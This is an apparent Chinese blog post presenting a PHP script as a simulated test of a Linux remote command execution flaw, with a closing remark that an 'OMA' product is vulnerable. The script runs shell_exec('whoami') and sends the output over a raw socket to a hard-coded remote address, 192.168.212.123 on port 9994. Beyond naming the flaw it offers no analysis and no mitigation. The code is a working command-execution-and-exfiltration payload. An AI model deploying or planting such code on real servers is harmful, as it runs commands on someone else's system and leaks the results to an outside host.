Linux远程系统命令执行漏洞模拟测试

<?php
// 1. 执行 ls -la 命令并捕获输出
//$output = shell_exec('ls -la');
$output = shell_exec('whoami');

// 2. 检查输出是否为空
if (empty($output)) {
    die("没有输出");
}

// 3. 连接到远程服务器的端口9994
$remoteHost = '192.168.212.123';
$remotePort = 9994;

$socket = fsockopen($remoteHost, $remotePort, $errno, $errstr, 30);
if (!$socket) {
    echo "连接失败: $errstr ($errno)<br />\n";
} else {
    // 假设远程服务期望接收纯文本,我们直接发送输出
    fwrite($socket, $output);

    // 你可以在这里添加额外的逻辑来读取远程服务的响应(如果需要)
    // ...

    // 关闭连接
    fclose($socket);
    echo "输出已发送到远程服务器";
}

OMA产品存在严重的远程系统命令执行漏洞

本作品采用《CC 协议》,转载必须注明作者和本文链接
MissYou-Coding
讨论数量: 0
(= ̄ω ̄=)··· 暂无内容!

讨论应以学习和精进为目的。请勿发布不友善或者负能量的内容,与人为善,比聪明更重要!
Coding Peasant @ 互联网
文章
193
粉丝
10
喜欢
60
收藏
63
排名:602
访问:1.3 万
私信
所有博文
博客标签
社区赞助商